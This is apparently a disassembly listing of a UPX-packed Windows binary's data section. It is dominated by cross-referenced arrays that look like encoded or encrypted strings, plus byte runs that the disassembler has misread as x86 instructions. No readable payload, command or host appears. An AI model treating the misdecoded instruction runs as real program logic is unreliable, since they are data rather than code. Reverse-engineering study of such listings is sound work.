byte_428DAE db 3Bh ; CODE XREF: UPX0:00428E01�j
; ---------------------------------------------------------------------------
loc_428DAF: ; CODE XREF: UPX0:00428D5B�j
; DATA XREF: sub_4028F0+38F�o
add ds:35B23B0Ch, ah
aas
add [esi], dh
ficomp dword ptr [ebx+28h]
add eax, 275EA588h
loopne loc_428DFA
lodsb
jo short near ptr loc_428DDD+2
fdivr qword ptr [edi+2939B7C5h]
not dword ptr [ecx+15h]
adc al, 60h
loc_428DD0: ; DATA XREF: sub_4028F0+3B0�o
and eax, 35B23B0Ch
aas
add [eax], ah
into
inc esi
jnz short loc_428DFA
xchg eax, ebp
loc_428DDD: ; CODE XREF: UPX0:00428DC3�j
mov al, ds:70EF3605h
stosb
xor [edi], ebx
mov dl, 0D4h
cmpsd
and eax, 3FBD2Fh
; ---------------------------------------------------------------------------
dw 0
dword_428DF0 dd 0B23B0C25h, 35003F35h ; DATA XREF: sub_4028F0+3D1�o
db 0CAh, 4Dh
; ---------------------------------------------------------------------------
loc_428DFA: ; CODE XREF: UPX0:00428DC0�j
; UPX0:00428DDA�j
imul edx, [ebx], -73h
cmpsb
pop ecx
db 26h
scas dword ptr es:[edi]
jg short near ptr byte_428DAE
js short locret_428E18
pushf
rep sal dword ptr [eax+4BFC3E39h], cl
dec esi
cmp eax, [eax]
loc_428E10: ; DATA XREF: sub_4028F0+3F2�o
and eax, 35B23B0Ch
aas
add [ecx], dh
locret_428E18: ; CODE XREF: UPX0:00428E03�j
retf 361Fh
; ---------------------------------------------------------------------------
db 40h
dd 3945A0CEh, 6BA639EEh, 0C8F5C10Eh, 5B64B6h
dword_428E2C dd 0B23B0C25h, 33003F35h, 47374AD8h, 3142E7D5h, 7DEA79E7h
; DATA XREF: sub_4028F0+413�o
dd 0C3E2C109h, 92743FACh
dword_428E48 dd 0B23B0C25h, 2C003F35h, 27558CAh, 3640BB81h, 77EB71EFh
; DATA XREF: sub_4028F0+434�o
dd 89FFD512h, 0E0293EA1h, 4F4F0F5Ah, 1
dword_428E6C dd 0B23B0C25h, 25003F35h, 186948C0h, 3605AA89h, 31AA70EFh
; DATA XREF: sub_4028F0+45C�o
dd 0D4E2C61Fh, 0BD2F25A7h, 3Fh
dword_428E8C dd 0B23B0C25h, 28003F35h, 586F45C6h, 715CBDD2h, 71A378E8h
; DATA XREF: sub_4028F0+47D�o
dd 0D4E5D053h, 0E6352EB0h, 6110h
dword_428EAC dd 0B23B0C25h, 42003F35h ; DATA XREF: sub_403950+300�o
dword_428EB4 dd 0A723112Bh, 2F2A3Ch ; DATA XREF: sub_403950+573�o
dword_428EBC dd 0A723112Bh, 2F2A3Bh ; DATA XREF: sub_403950+5A9�o
dword_428EC4 dd 0A723112Bh, 2F2A3Ah ; DATA XREF: sub_403950+5CA�o
dword_428ECC dd 0B6260C71h, 42117563h ; DATA XREF: sub_402DA0+26�o
dword_428ED4 dd 0AB3B5771h, 7C4A7C7Bh, 0AFh ; DATA XREF: sub_402DA0+41�o
dword_428EE0 dd 0B6260C71h, 42117563h ; DATA XREF: sub_402DA0+68�o
dword_428EE8 dd 0C27B4879h ; DATA XREF: sub_402E60+2�o
; ---------------------------------------------------------------------------
loc_428EEC: ; DATA XREF: sub_402E90+27�o
jno short locret_428F0C
cmp eax, 5C7562A3h
daa
fist dword ptr [ecx]
push es
loc_428EF7: ; DATA XREF: sub_402E90+42�o
add [ecx+1Eh], dh
cmp eax, 0F7562A3h
xor ebp, ebx
dec esp
loc_428F02: ; DATA XREF: sub_402E90+5F�o
cmp esi, [esi+71h]
push edi
sub [eax+314A7D6Eh], esi
locret_428F0C: ; CODE XREF: UPX0:loc_428EEC�j
retf 385Bh
; ---------------------------------------------------------------------------
db 76h
dword_428F10 dd 0A33D1E71h, 310F7562h, 763B4CDDh ; DATA XREF: sub_402E90+8E�o
dword_428F1C dd 2 dup(0C21B3D0Ah) ; DATA XREF: sub_402FE0+38�o
dword_428F24 dd 0A92E1A63h, 0Fh ; DATA XREF: sub_4030C0+CD�o
dword_428F2C dd 0C21B3D0Ah ; DATA XREF: sub_4030C0+191�o
dword_428F30 dd 0A7371D63h, 0Fh ; DATA XREF: sub_4033F0+115�o
dword_428F38 dd 0A7371D63h, 0Fh ; DATA XREF: sub_4033F0+188�o
dword_428F40 dd 0A7371D63h, 0Fh ; DATA XREF: sub_4033F0+279�o
dword_428F48 dd 0A7371D63h, 0Fh ; DATA XREF: sub_4033F0+2F0�o
dword_428F50 dd 0C21B3D0Ah, 0B63F1528h, 3A4A3076h, 2764ACCh, 5F45A689h
; DATA XREF: sub_4033F0+37A�o
; ---------------------------------------------------------------------------
loc_428F64: ; DATA XREF: sub_404660+3�o
cmp dl, [ebx+2Dh]
locret_428F67: ; DATA XREF: sub_404DB0+41A�o
retn 111Ah
; ---------------------------------------------------------------------------
dw 0A621h
dd 625C6760h, 7636019Ah
dword_428F74 dd 0A621111Ah, 625C6760h, 7637019Ah ; DATA XREF: sub_404DB0+4F9�o
dword_428F80 dd 0B23B0D02h, 625B6360h, 137446E9h, 3347A897h, 71B746A1h
; DATA XREF: sub_4054B0+C�o
dd 7Ch
dword_428F98 dd 0E22B1C0Ch, 0B0F7F7Bh, 46941C8h, 3667E985h, 0C562F2h
; DATA XREF: sub_4054B0+2C�o
dword_428FAC dd 0A32A0A0Eh, 300F757Bh, 566343DAh, 7F59A686h, 81h
; DATA XREF: sub_4055E0+4E�o
; ---------------------------------------------------------------------------
loc_428FC0: ; DATA XREF: sub_4055E0+9A�o
or al, 14h
and ebp, [ebp+2E4E3078h]
retn
; ---------------------------------------------------------------------------
db 0Fh, 67h, 15h
dd 365DA094h, 6DA07FF5h, 0D4FFD55Ch, 0FB333FE2h, 105A414Ch
dd 1C773071h, 18CF9EF3h, 3AD4h
dword_428FEC dd 0A7371D63h, 0Fh ; DATA XREF: sub_405940+A4�o
dword_428FF4 dd 0A4260863h, 0Fh ; DATA XREF: sub_405940+C7�o
dword_428FFC dd 0A7371D63h, 0Fh ; DATA XREF: sub_405940+14F�o
dword_429004 dd 0A4260863h, 0Fh ; DATA XREF: sub_405940+172�o
dword_42900C dd 0B629171Eh, 275D7178h, 156F62F3h, 3058A692h, 499962E7h
; DATA XREF: sub_405FB0+1E�o
dd 0C9F4DD15h, 0DC7B38B5h, 15783D6Bh, 117B2E73h, 5C3BCE6h
dd 15C553C9h, 0A4481058h, 0C2B47185h, 0E80Dh
dword_429044 dd 0B629171Eh, 275D7178h, 156F62F3h, 3058A692h, 499962E7h
; DATA XREF: sub_405FB0+3C�o
dd 0C9F4DD15h, 0D10738B5h, 549134Ah, 1A48286Fh, 18CF99E0h
dd 3AD4h
dword_429070 dd 0B629171Eh, 275D7178h, 156F62F3h, 3058A692h, 499962E7h
; DATA XREF: sub_405FB0+5C�o
dd 0C9F4DD15h, 0D10738B5h, 549134Ah, 1A48286Fh, 18CF99E0h
dd 0EF866D4h, 476Ah
dword_4290A0 dd 0A621113Ah, 1D5C6760h, 4675BDCh, 5F5BBC94h ; DATA XREF: sub_405FB0+7C�o
dword_4290B0 dd 0AE2A101Eh, 1063h ; DATA XREF: sub_405FB0+9C�o
dword_4290B8 dd 0B02A0B18h, 36467E66h, 0AFh ; DATA XREF: sub_405FB0+BC�o
dword_4290C4 dd 0EC29153Ah, 421E3E3Eh ; DATA XREF: sub_405FB0+DC�o
dword_4290CC dd 0EC29153Ah, 421D3E3Eh, 0 ; DATA XREF: sub_405FB0+FC�o
dword_4290D8 dd 0B629171Eh, 275D7178h, 156F62F3h, 3058A692h, 499962E7h
; DATA XREF: sub_405FB0+11C�o
dd 0C9F4DD15h, 0D10738B5h, 549134Ah, 1A48286Fh, 18CF99E0h
dd 3EF66D4h, 0B84E2B74h, 0FE8F6C8Ch, 8DDC8D0Bh, 0A1E2C96Fh
dd 23DEB001h, 2Dh
dword_42911C dd 0A32C1701h, 326E3063h, 2676BDFh, 0C981h ; DATA XREF: sub_405FB0+13C�o
dword_42912C dd 9609371Eh, 77D5158h, 186F78F3h, 3047B9B5h, 0C572E0h
; DATA XREF: sub_405FB0+15C�o
dword_429140 dd 9609371Eh, 77D5158h, 186F78F3h, 3E4FB9B5h, 0C573F5h
; DATA XREF: sub_405FB0+17C�o
dword_429154 dd 0B13D1D1Bh, 42417F66h ; DATA XREF: sub_405FB0+19C�o
dword_42915C dd 0AD3D0A08h, 2440307Dh, 1A6F498Fh, 3E46E985h, 70AC66F1h
; DATA XREF: sub_407140+E8�o
dd 88BE9D1Bh, 0C2h
dword_429178 dd 0A4260863h, 0Fh ; DATA XREF: UPX0:00406E4E�o
dword_429180 dd 0A4260863h, 32466A21h, 0AFh ; DATA XREF: UPX0:00406EA7�o
dword_42918C dd 0A4260863h, 355C6021h, 66F5581h, 0E0h, 0A022011Eh, 650F7C60h
; DATA XREF: UPX0:00406EFE�o
dd 56211F9Fh, 390BBA89h, 7AAB63EEh, 0A6BE9D52h, 0AF3A3623h
dd 420F2A2Fh
; ---------------------------------------------------------------------------
loc_4291BC: ; DATA XREF: sub_4075D0+38�o
aaa
add dh, ds:5E617EF0h
add bl, dl
pop esp
db 67h
pop eax
loc_4291C8: ; DATA XREF: sub_4091D0+117�o
and dword ptr [esi+1D235F46h], 3Bh
mov ds:701C797Fh, eax
or dword ptr [ebx+6Ah], 0E01Ah
loc_4291DB: ; DATA XREF: sub_4091D0+8E�o
add [esi], bh
push cs
cmp eax, 1797FA3h
db 26h
retn
; ---------------------------------------------------------------------------
db 43h, 6, 0
dword_4291E8 dd 913B1D03h, 275D7167h, 1B7341EAh, 0E0h ; DATA XREF: sub_4091D0+C3�o
dword_4291F8 dd 833B1D03h, 376D797Fh, 46349C9h, 3A4EBBA6h, 81h
; DATA XREF: sub_4091D0+E1�o
dword_42920C dd 913B1D03h, 275D7167h, 1B7341EAh, 0E0h ; DATA XREF: sub_4091D0:loc_4092F1�o
; ---------------------------------------------------------------------------
loc_42921C: ; DATA XREF: sub_408FC0+C0�o
and ebx, ds:797FA33Bh
sbb al, 70h
or dword ptr [ebx+6Ah], 0E01Ah
loc_42922B: ; DATA XREF: sub_408FC0+66�o
add [esi], bh
push cs
cmp eax, 1797FA3h
db 26h
retn
; ---------------------------------------------------------------------------
db 43h, 6, 0
dword_429238 dd 913B1D03h, 275D7167h, 76624BEEh ; DATA XREF: sub_408FC0+84�o
dword_429244 dd 0B13C193Dh, 265D7F78h, 0AFh ; DATA XREF: sub_40A1E0+1E�o
dword_429250 dd 0EC2E0B38h, 42427F6Ch ; DATA XREF: sub_40A1E0+52�o
dword_429258 dd 921B351Eh, 304A432Fh, 76744AD9h ; DATA XREF: sub_40A2D0+28�o
dword_429264 dd 921B351Eh, 2342552Fh, 372643C6h, 3A59AD84h, 0C565F2h
; DATA XREF: sub_40A2D0+50�o
dword_429278 dd 921B351Eh, 3040402Fh, 2FDBh ; DATA XREF: sub_40A2D0+72�o
dword_429284 dd 921B351Eh, 3146542Fh, 0F6743DFh, 324A87C0h, 16E4h
; DATA XREF: sub_40A2D0+94�o
dword_429298 dd 0F11F371Dh, 275C452Fh, 17480FDDh, 2BAC8Dh ; DATA XREF: sub_40A2D0+BC�o
dword_4292A8 dd 0A6774868h, 0Fh ; DATA XREF: sub_40A2D0+E8�o
dword_4292B0 dd 0AE3A170Eh, 2D41306Bh, 19650FDBh, 3C4EA78Eh, 71B136F5h
; DATA XREF: sub_4106A0+51�o
dd 0D4F5C05Ch, 0B2292EB4h, 4017121Ah, 1E3824h, 0AD3D0A08h
dd 275D307Dh, 186F4BCEh, 3058E994h, 6AA07DE2h, 0D2F1D75Ch
dd 0B77B67A3h, 615Bh
dword_4292F4 dd 0AD3D0A08h, 275D307Dh, 186F4BCEh, 3058E987h, 6AA07DE2h
; DATA XREF: sub_40F2E0+71�o
dd 0D2F1D75Ch, 0B77B67A3h, 615Bh, 0AD3D0A08h, 275D307Dh
dd 186F4BCEh, 3058E987h, 6AA07DE2h, 0D2F1D75Ch, 0B77B67A3h
dd 615Bh, 0AD3D0A08h, 3058307Dh, 186F5BC6h, 3058E987h
dd 6AA07DE2h, 0D2F1D75Ch, 0B77B67A3h, 615Bh
dword_429354 dd 0AD3D0A08h, 3058307Dh, 186F5BC6h, 3058E987h, 6AA07DE2h
; DATA XREF: sub_40F3B0+7A�o
dd 0D2F1D75Ch, 0B77B67A3h, 615Bh, 0AD3D0A08h, 3058307Dh
dd 186F5BC6h, 3058E987h, 6AA07DE2h, 0D2F1D75Ch, 0B77B67A3h
dd 615Bh
dword_429394 dd 0AD3D0A08h, 3058307Dh, 186F5BC6h, 3058E987h, 6AA07DE2h
; DATA XREF: sub_40F480+6C�o
dd 0D2F1D75Ch, 0B77B67A3h, 615Bh
dword_4293B4 dd 0AD3D0A08h, 275D307Dh, 186F4BCEh, 3058E987h, 6AA07DE2h
; DATA XREF: sub_40F540+74�o
dd 0D2F1D75Ch, 0B77B67A3h, 615Bh
dword_4293D4 dd 8D0D391Ah, 4241757Fh, 0EF625560h, 6F023D22h, 5B2B0282h
; DATA XREF: sub_40A6A0+AC�o
dd 7206E4CDh, 33E83BACh, 909E51h, 0AD2C1D3Fh, 780F747Dh
dd 7C620A8Fh, 0E0h, 0B23C1109h, 62567163h, 136B4EE1h, 7F0BE9C0h
dd 6DE036BBh, 0B376h, 0AB2E1508h, 620F3063h, 4624BEEh
dd 7F58BA85h, 6DE036BBh, 0B376h, 0A92C1103h, 620F302Fh
dd 136B4EE1h, 7F0BE9C0h, 6DE036BBh, 0B376h, 0EF625560h
dd 6F023D22h, 5B2B0282h, 7206E4CDh, 33E83BACh, 909E51h
dword_429464 dd 0A53F1263h, 0Fh ; DATA XREF: sub_40AC50+82�o
dword_42946C dd 0A53F1263h, 32466A21h, 0AFh ; DATA XREF: sub_40AC50+D5�o
dword_429478 dd 0A53F1263h, 314E6021h, 0C2858DCh, 2BB989h ; DATA XREF: sub_40AC50+121�o
dword_429488 dd 0A53F1263h, 0Fh ; DATA XREF: sub_40AC50+16D�o
dword_429490 dd 0A53F1263h, 32466A21h, 0AFh ; DATA XREF: sub_40AC50+1BB�o
dword_42949C dd 0A53F1263h, 314E6021h, 0C2858DCh, 2BB989h ; DATA XREF: sub_40AC50+20B�o
; ---------------------------------------------------------------------------
loc_4294AC: ; DATA XREF: sub_40B0E0+E�o
cmp dl, [ebx+2Dh]
retn 153Ah
; ---------------------------------------------------------------------------
dw 0EC29h
dd 42487F63h
dword_4294B8 dd 0EC380F3Ah, 6C41657Ch, 766B40CCh ; DATA XREF: sub_40C480+2E1�o
; ---------------------------------------------------------------------------
loc_4294C4: ; DATA XREF: sub_40C480+302�o
and al, 16h
sub esp, [edi+36473E77h]
retn 643h
; ---------------------------------------------------------------------------
align 10h
dword_4294D0 dd 9D23142Ch, 295C796Bh, 2FDCh ; DATA XREF: sub_40C7C0+138�o
byte_4294DC db 71h, 8 ; DATA XREF: sub_40B1E0+26�o
; ---------------------------------------------------------------------------
loc_4294DE: ; CODE XREF: UPX0:loc_4294DE�j
jno short loc_4294DE
; ---------------------------------------------------------------------------
dd 7E11626Dh, 76385F80h
dword_4294E8 dd 8A710871h, 630E3066h, 629138Eh, 0C9DEh ; DATA XREF: sub_40B1E0+4C�o
dword_4294F8 dd 0E2710871h, 625F7955h, 56470FFFh, 7F78E9B3h, 0C536BBh
; DATA XREF: sub_40B1E0+8D�o
dword_42950C dd 0FC3F5771h, 0Fh ; DATA XREF: sub_40B1E0+FE�o
dword_429514 dd 0E4710871h, 325C7261h, 14680994h, 6310B993h, 1EFB66AEh
; DATA XREF: sub_40B1E0+13B�o
byte_429528 db 71h, 8 ; DATA XREF: sub_40B1E0+17B�o
; ---------------------------------------------------------------------------
loc_42952A: ; CODE XREF: UPX0:loc_42952A�j
jno short loc_42952A
; ---------------------------------------------------------------------------
dd 7E11626Dh, 76385F80h
byte_429534 db 71h, 8 ; DATA XREF: sub_40B1E0+21F�o
; ---------------------------------------------------------------------------
loc_429536: ; CODE XREF: UPX0:loc_429536�j
jno short loc_429536
; ---------------------------------------------------------------------------
dd 7E11626Dh, 76385F80h
dword_429540 dd 8A710871h, 630E3066h, 629138Eh, 0C9DEh ; DATA XREF: sub_40B1E0+241�o
dword_429550 dd 0C2710871h ; DATA XREF: sub_40B1E0+27D�o
dword_429554 dd 0FC3F5771h, 0Fh ; DATA XREF: sub_40B1E0+2EB�o
dword_42955C dd 0C2710871h ; DATA XREF: sub_40B1E0+32B�o
dword_429560 dd 0FC3F5771h, 0Fh ; DATA XREF: sub_40B1E0+39B�o
dword_429568 dd 0EF710871h, 32002C22h, 2F91h ; DATA XREF: sub_40B1E0+3DB�o
dword_429574 dd 80710871h, 625B636Ah, 17614AFDh, 6358AD92h, 1EFB66AEh
; DATA XREF: sub_40B1E0+41B�o
dword_429588 dd 0E4710871h, 325C7261h, 14680994h, 6310B993h, 1EFB66AEh
; DATA XREF: sub_40B1E0+45B�o
byte_42959C db 71h, 8 ; DATA XREF: sub_40B1E0+49B�o
; ---------------------------------------------------------------------------
loc_42959E: ; CODE XREF: UPX0:loc_42959E�j
jno short loc_42959E
; ---------------------------------------------------------------------------
dd 7E11626Dh, 76385F80h
byte_4295A8 db 71h, 8 ; DATA XREF: sub_40B1E0+53F�o
; ---------------------------------------------------------------------------
loc_4295AA: ; CODE XREF: UPX0:loc_4295AA�j
jno short loc_4295AA
; ---------------------------------------------------------------------------
dd 7E11626Dh, 76385F80h
dword_4295B4 dd 8A710871h, 630E3066h, 629138Eh, 0C9DEh ; DATA XREF: sub_40B1E0+561�o
dword_4295C4 dd 0C2710871h ; DATA XREF: sub_40B1E0+59D�o
dword_4295C8 dd 0FC3F5771h, 0Fh ; DATA XREF: sub_40B1E0+60B�o
dword_4295D0 dd 0C2710871h ; DATA XREF: sub_40B1E0+64B�o
dword_4295D4 dd 0FC3F5771h, 0Fh ; DATA XREF: sub_40B1E0+6BB�o
dword_4295DC dd 0EF710871h, 32002C22h, 2F91h ; DATA XREF: sub_40B1E0+6FB�o
dword_4295E8 dd 80710871h, 625B636Ah, 17614AFDh, 6358AD92h, 1EFB66AEh
; DATA XREF: sub_40B1E0+73B�o
dword_4295FC dd 0E4710871h, 325C7261h, 14680994h, 6310B993h, 1EFB66AEh
; DATA XREF: sub_40B1E0+77B�o
byte_429610 db 71h, 8 ; DATA XREF: sub_40B1E0+7BB�o
; ---------------------------------------------------------------------------
loc_429612: ; CODE XREF: UPX0:loc_429612�j
jno short loc_429612
; ---------------------------------------------------------------------------
dd 7E11626Dh, 76385F80h, 0AE3B0D02h, 62447F60h, 1D6540FCh
dd 0D0BBD85h, 6AAA74EEh, 7Ch
dword_429634 dd 0EC29153Ah, 6C576462h, 2F9Bh ; DATA XREF: sub_40BA20+2�o
dword_429640 dd 0EC29153Ah, 6C576462h, 2F9Bh ; DATA XREF: sub_40BA20+28�o
dword_42964C dd 0EC7A4D7Fh, 6C1A253Dh, 58331A9Dh, 5F1EFCD2h ; DATA XREF: sub_40BA70+1B�o
dword_42965C dd 0C21B3D0Ah ; DATA XREF: sub_40BAE0+8E�o
dword_429660 dd 0B02C1100h, 24406360h, 2FDBh ; DATA XREF: sub_40BF40+263�o
dword_42966C dd 9621111Ah, 31437F60h, 0AFh ; DATA XREF: sub_40BF40+2B4�o
dword_429678 dd 0B629171Eh, 275D7178h, 156F62F3h, 3058A692h, 499962E7h
; DATA XREF: sub_40BC80+D�o
dd 0C9F4DD15h, 0D10738B5h, 549134Ah, 1A48286Fh, 18CF99E0h
dd 3EF66D4h, 0B84E2B74h, 0FE8F6C8Ch, 8DDC8D0Bh, 0A1E2C96Fh
dd 23DEB001h, 2Dh
dword_4296BC dd 0A32C1701h, 326E3063h, 2676BDFh, 0C981h ; DATA XREF: sub_40BC80+3C�o
dword_4296CC dd 0B02C1100h, 24406360h, 2FDBh ; DATA XREF: sub_40BC80+113�o
dword_4296D8 dd 9621111Ah, 31437F60h, 0AFh, 0A4260863h, 0Fh, 0A7371D63h
; DATA XREF: sub_40BC80+164�o
dd 0Fh
dword_4296F4 dd 0A7371D63h, 0Fh ; DATA XREF: sub_40BE50+91�o
dword_4296FC dd 0C2751D1Fh ; DATA XREF: sub_40CDA0+3A�o
dword_429700 dd 0C2753D1Fh ; DATA XREF: sub_40CDA0+5C�o
dword_429704 dd 0E2751D1Fh, 2F7967h ; DATA XREF: sub_40CDA0+8F�o
dword_42970C dd 0C22C113Dh ; DATA XREF: sub_40CDA0+BC�o
dword_429710 dd 0B12C113Dh, 0Fh ; DATA XREF: sub_40CDA0+DE�o
dword_429718 dd 0AD291624h, 0Fh ; DATA XREF: sub_40CDA0+100�o
dword_429720 dd 0E2753D1Fh, 424C797Fh ; DATA XREF: sub_40CDA0+122�o
dword_429728 dd 0E2751D1Fh, 2D497E66h, 0AFh ; DATA XREF: sub_40CDA0+144�o
dword_429734 dd 0AD3F1524h, 2C4E647Dh, 2FDBh ; DATA XREF: sub_40CDA0+16C�o
dword_429740 dd 0A62E1D3Fh, 2B47642Fh, 2FDCh ; DATA XREF: sub_40CDA0+18E�o
dword_42974C dd 0AD231D05h, 0Fh ; DATA XREF: sub_40CDA0+1B0�o
dword_429754 dd 0B4260A3Dh, 424A646Eh ; DATA XREF: sub_40CDA0+1D2�o
dword_42975C dd 0B4260A3Dh, 624A646Eh, 56546DFh, 0E0h ; DATA XREF: sub_40CDA0+1F4�o
dword_42976C dd 0AA3C0D0Fh, 0Fh ; DATA XREF: sub_40CDA0+21C�o
; ---------------------------------------------------------------------------
loc_429774: ; DATA XREF: sub_40CDA0+23E�o
add ebx, [ecx]
cmp esp, [ebx+2F6963h]
loc_42977C: ; DATA XREF: sub_40CDA0+260�o
add [edi], edx
and esp, [ebx+0Fh]
loc_429784: ; DATA XREF: sub_40CDA0+282�o
add [ecx], ebx
cmp dh, [eax+106Eh]
loc_42978C: ; DATA XREF: sub_40CDA0+2A4�o
add [ecx], ebx
cmp dh, [eax+2C4E306Eh]
retf
; ---------------------------------------------------------------------------
db 0Fh, 4Ch, 19h
dd 2BA788h
dword_42979C dd 0AE3A191Dh, 106Eh ; DATA XREF: sub_40CDA0+2CC�o
dword_4297A4 dd 0A72D171Fh, 2F647Dh ; DATA XREF: sub_40CDA0+2EE�o
dword_4297AC dd 0AB3B1B0Ch, 2F7E60h ; DATA XREF: sub_40CDA0+310�o
dword_4297B4 dd 0B13C1100h, 23475B2Fh, 2FC1h ; DATA XREF: sub_40CDA0+332�o
dword_4297C0 dd 0B72E1D0Fh, 2F697Bh ; DATA XREF: sub_40CDA0+354�o
dword_4297C8 dd 0B13C1106h, 0Fh ; DATA XREF: sub_40CDA0+37C�o
dword_4297D0 dd 0C2371D1Eh ; DATA XREF: sub_40CDA0+39E�o
dword_4297D4 dd 0A9201701h, 625B712Fh, 56F47DBh, 5F0AE8C1h ; DATA XREF: sub_40CDA0+3C0�o
dword_4297E4 dd 0B02C1604h, 2046746Ah, 57274AC3h, 0E0h ; DATA XREF: sub_40CDA0+3E2�o
; ---------------------------------------------------------------------------
loc_4297F4: ; DATA XREF: sub_40CDA0+410�o
or esi, [ecx]
or [ebx+0Fh], eax
loc_4297FC: ; DATA XREF: sub_40CDA0+441�o
add dl, [esi+esi]
scasd
jg short loc_429867
pop esp
inc edx
loc_429804: ; DATA XREF: sub_40CDA0+463�o
add dl, [esi+ebp]
locret_429807: ; DATA XREF: sub_40D270+36�o
retn 112Fh
; ---------------------------------------------------------------------------
dw 0AE23h
dd 0Fh
dword_429810 dd 0AC271727h, 0Fh ; DATA XREF: sub_40D270+5C�o
dword_429818 dd 0AB391929h, 106Bh ; DATA XREF: sub_40D270+7C�o
dword_429820 dd 0C22B1D39h ; DATA XREF: sub_40D270+9C�o
dword_429824 dd 0BA2A142Ch, 0Fh ; DATA XREF: sub_40D270+BC�o
dword_42982C dd 0B0201D2Ah, 2F7568h ; DATA XREF: sub_40D270+DE�o
dword_429834 dd 0AE23113Ah, 42427166h ; DATA XREF: sub_40D270+100�o
dword_42983C dd 0C22D172Fh ; DATA XREF: sub_40D270+122�o
dword_429840 dd 0A72D173Fh, 2F647Dh ; DATA XREF: sub_40D270+144�o
dword_429848 dd 0B8211925h, 0Fh ; DATA XREF: sub_40D270+16C�o
; ---------------------------------------------------------------------------
loc_429850: ; DATA XREF: sub_40D270+18E�o
sub al, 1Ch
locret_429852: ; DATA XREF: sub_40D270+1B0�o
db 2Eh
retn 0E28h
; ---------------------------------------------------------------------------
dw 0C22Eh
dword_429858 dd 0AF2E1C2Ch, 0Fh ; DATA XREF: sub_40D270+1D2�o
dword_429860 dd 0B8261428h ; DATA XREF: sub_40D270+1F4�o
db 6Eh, 72h, 4Ah
; ---------------------------------------------------------------------------
loc_429867: ; CODE XREF: UPX0:00429800�j
; DATA XREF: sub_40D270+21C�o
mov dword ptr ss:[edi], 11200000h
sub al, 0A9h
arpl [ebp+2Fh], si
loc_429873: ; DATA XREF: sub_40D270+23E�o
add [edi], ah
sbb [ecx+ebp*4], ebp
sldt word ptr [eax]
loc_42987B: ; DATA XREF: sub_40D270+260�o
add [ecx], ch
pop ss
and [ebx+2F7463h], esp
loc_429884: ; DATA XREF: sub_40D270+282�o
and [ecx], bl
cmp esi, [esi+0Fh]
loc_42988C: ; DATA XREF: sub_40D270+2A4�o
cmp [edi], edx
and al, dl
loc_429890: ; DATA XREF: sub_40D270+2CC�o
daa
sbb eax, 1076B03Dh
; ---------------------------------------------------------------------------
dw 0
dword_429898 dd 0A03D192Fh, 424E626Eh ; DATA XREF: sub_40D270+2EE�o
dword_4298A0 dd 0AF221739h, 1076h ; DATA XREF: sub_40D270+310�o
dword_4298A8 dd 0AB231D2Eh, 2F7561h ; DATA XREF: sub_40D270+332�o
dword_4298B0 dd 0AB3D1920h, 2F786Eh ; DATA XREF: sub_40D270+354�o
dword_4298B8 dd 0B03D1920h, 1076h ; DATA XREF: sub_40D270+37C�o
dword_4298C0 dd 0B52E103Eh, 1061h ; DATA XREF: sub_40D270+39E�o
dword_4298C8 dd 0C2211729h ; DATA XREF: sub_40D270+3C0�o
dword_4298CC dd 0AB3D102Eh, 107Ch ; DATA XREF: sub_40D270+3E2�o
dword_4298D4 dd 0A93D1920h, 0Fh ; DATA XREF: sub_40D270+404�o
dword_4298DC dd 0A62E0A2Fh, 0Fh ; DATA XREF: sub_40D270+42C�o
dword_4298E4 dd 0AB221929h, 2F7E6Ah ; DATA XREF: sub_40D270+44E�o
dword_4298EC dd 0B02C1120h, 24406360h, 601DBh ; DATA XREF: sub_40D720+5C�o
dword_4298F8 dd 0EC210B20h, 0Fh ; DATA XREF: sub_40D720+7E�o
dword_429900 dd 0EC210D3Eh, 42427F6Ch ; DATA XREF: sub_40D720+A0�o
dword_429908 dd 0A7380A29h, 2F3E6Dh ; DATA XREF: sub_40D720+C2�o
dword_429910 dd 0A322013Eh, 0Fh ; DATA XREF: sub_40D720+E4�o
dword_429918 dd 0EC3F0E2Ch, 0Fh ; DATA XREF: sub_40D720+10C�o
dword_429920 dd 0A32C1B20h, 6C4A7569h, 0AFh ; DATA XREF: sub_40D720+12E�o
dword_42992C dd 0AE3C0D3Fh, 2F6366h ; DATA XREF: sub_40D720+150�o
dword_429934 dd 0B23F0D3Eh, 425B6260h ; DATA XREF: sub_40D8F0+5C�o
dword_42993C dd 0B73D113Bh, 107Ch ; DATA XREF: sub_40D8F0+7E�o
dword_429944 dd 0A321192Eh, 2101716Bh, 642C0h ; DATA XREF: sub_40D9F0+70�o
dword_429950 dd 0EC3A162Ah, 42486260h ; DATA XREF: sub_40D9F0+94�o
dword_429958 dd 0B13C0D2Ch, 23427566h, 152843C6h, 3E05A48Fh, 16F4h
; DATA XREF: sub_40D9F0+B3�o
dword_42996C dd 0AD21192Eh, 2B4E7D6Ah, 196501C3h, 0C98Dh ; DATA XREF: sub_40D9F0+DC�o
dword_42997C dd 0AF26162Ch, 6C43796Eh, 76724AC1h ; DATA XREF: sub_40D9F0+FE�o
dword_429988 dd 0B1201720h, 23423D6Ah, 152843C6h, 2BA48Fh ; DATA XREF: sub_40D9F0+120�o
dword_429998 dd 0AB2E163Eh, 23423D63h, 182843C6h, 2BBD85h ; DATA XREF: sub_40D9F0+142�o
dword_4299A8 dd 0AE2E103Ah, 23423D6Ah, 152843C6h, 2BA48Fh ; DATA XREF: sub_40D9F0+164�o
dword_4299B8 dd 0A623113Ah, 2E467162h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+18C�o
dword_4299C8 dd 0AD271934h, 2D4C3E60h, 2FC2h ; DATA XREF: sub_40D9F0+1AE�o
dword_4299D4 dd 0AE261920h, 204A673Dh, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+1D0�o
dword_4299E4 dd 0AF351A29h, 6C43796Eh, 766B40CCh ; DATA XREF: sub_40D9F0+1F2�o
dword_4299F0 dd 0AF2A1B29h, 6C43796Eh, 766B40CCh ; DATA XREF: sub_40D9F0+214�o
dword_4299FC dd 0A32B1129h, 2E467162h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+23C�o
dword_429A0C dd 0A33D1729h, 2E467162h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+25E�o
dword_429A1C dd 0B63C192Bh, 2E467162h, 766B4981h ; DATA XREF: sub_40D9F0+280�o
dword_429A28 dd 0A3290120h, 2342647Ch, 152843C6h, 2BA48Fh ; DATA XREF: sub_40D9F0+2A2�o
dword_429A38 dd 0B63C192Bh, 2B4E7D6Ah, 58744AC3h, 5F46A683h ; DATA XREF: sub_40D9F0+2C4�o
dword_429A48 dd 0B63B1D21h, 2D4D626Ah, 46901D7h, 0C987h ; DATA XREF: sub_40D9F0+2EC�o
